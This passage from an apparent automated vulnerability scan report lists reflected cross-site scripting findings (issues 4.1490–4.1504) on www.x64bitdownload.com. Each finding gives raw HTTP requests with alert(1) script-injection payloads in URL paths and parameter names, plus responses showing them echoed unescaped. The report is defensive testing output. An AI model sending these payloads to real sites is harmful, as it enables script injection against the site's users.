Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-atom-downloads.html55aa1"><script>alert(1)</script>7678cf509d9" />
...[SNIP]...

4.1490. http://www.x64bitdownload.com/64-bit-atom-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-atom-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8505"><script>alert(1)</script>10d78ca816a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-atom-downloads.html?e8505"><script>alert(1)</script>10d78ca816a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-atom-downloads.html?e8505"><script>alert(1)</script>10d78ca816a=1" />
...[SNIP]...

4.1491. http://www.x64bitdownload.com/64-bit-audio-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-audio-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb3a9"><script>alert(1)</script>d0002961a7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-audio-downloads.htmlcb3a9"><script>alert(1)</script>d0002961a7e HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-audio-downloads.htmlcb3a9"><script>alert(1)</script>d0002961a7e" />
...[SNIP]...

4.1492. http://www.x64bitdownload.com/64-bit-audio-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-audio-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7c34"><script>alert(1)</script>baaa57e444b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-audio-downloads.html?c7c34"><script>alert(1)</script>baaa57e444b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-audio-downloads.html?c7c34"><script>alert(1)</script>baaa57e444b=1" />
...[SNIP]...

4.1493. http://www.x64bitdownload.com/64-bit-automatic-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-automatic-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ccfc"><script>alert(1)</script>7e29c8efc8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-automatic-downloads.html5ccfc"><script>alert(1)</script>7e29c8efc8f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:12 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-automatic-downloads.html5ccfc"><script>alert(1)</script>7e29c8efc8f" />
...[SNIP]...

4.1494. http://www.x64bitdownload.com/64-bit-automatic-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-automatic-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85109"><script>alert(1)</script>d22981fa63d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-automatic-downloads.html?85109"><script>alert(1)</script>d22981fa63d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-automatic-downloads.html?85109"><script>alert(1)</script>d22981fa63d=1" />
...[SNIP]...

4.1495. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-autoposter-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ba5f"><script>alert(1)</script>cd53e677bcf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-autoposter-downloads.html1ba5f"><script>alert(1)</script>cd53e677bcf HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-autoposter-downloads.html1ba5f"><script>alert(1)</script>cd53e677bcf" />
...[SNIP]...

4.1496. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-autoposter-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5be8e"><script>alert(1)</script>09953da3321 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-autoposter-downloads.html?5be8e"><script>alert(1)</script>09953da3321=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-autoposter-downloads.html?5be8e"><script>alert(1)</script>09953da3321=1" />
...[SNIP]...

4.1497. http://www.x64bitdownload.com/64-bit-binaries-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binaries-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6728"><script>alert(1)</script>d227ac254cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binaries-downloads.htmla6728"><script>alert(1)</script>d227ac254cf HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binaries-downloads.htmla6728"><script>alert(1)</script>d227ac254cf" />
...[SNIP]...

4.1498. http://www.x64bitdownload.com/64-bit-binaries-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binaries-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b928f"><script>alert(1)</script>b24ddd27216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binaries-downloads.html?b928f"><script>alert(1)</script>b24ddd27216=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binaries-downloads.html?b928f"><script>alert(1)</script>b24ddd27216=1" />
...[SNIP]...

4.1499. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd625"><script>alert(1)</script>5e17d0ba98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binary-downloader-downloads.htmlfd625"><script>alert(1)</script>5e17d0ba98 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binary-downloader-downloads.htmlfd625"><script>alert(1)</script>5e17d0ba98" />
...[SNIP]...

4.1500. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f33c0"><script>alert(1)</script>a7faec4549f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binary-downloader-downloads.html?f33c0"><script>alert(1)</script>a7faec4549f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:37 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binary-downloader-downloads.html?f33c0"><script>alert(1)</script>a7faec4549f=1" />
...[SNIP]...

4.1501. http://www.x64bitdownload.com/64-bit-binary-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d254"><script>alert(1)</script>67bb66d1da1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binary-downloads.html6d254"><script>alert(1)</script>67bb66d1da1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binary-downloads.html6d254"><script>alert(1)</script>67bb66d1da1" />
...[SNIP]...

4.1502. http://www.x64bitdownload.com/64-bit-binary-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5d5c"><script>alert(1)</script>01d31414795 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-binary-downloads.html?a5d5c"><script>alert(1)</script>01d31414795=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-binary-downloads.html?a5d5c"><script>alert(1)</script>01d31414795=1" />
...[SNIP]...

4.1503. http://www.x64bitdownload.com/64-bit-board-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-board-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c7db"><script>alert(1)</script>387ba0d9d20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-board-downloads.html3c7db"><script>alert(1)</script>387ba0d9d20 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:58 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-board-downloads.html3c7db"><script>alert(1)</script>387ba0d9d20" />
...[SNIP]...

4.1504. http://www.x64bitdownload.com/64-bit-board-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-board-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 123df"><script>alert(1)</script>9a9ef9bad1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-board-downloads.html?123df"><script>alert(1)</script>9a9ef9bad1b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
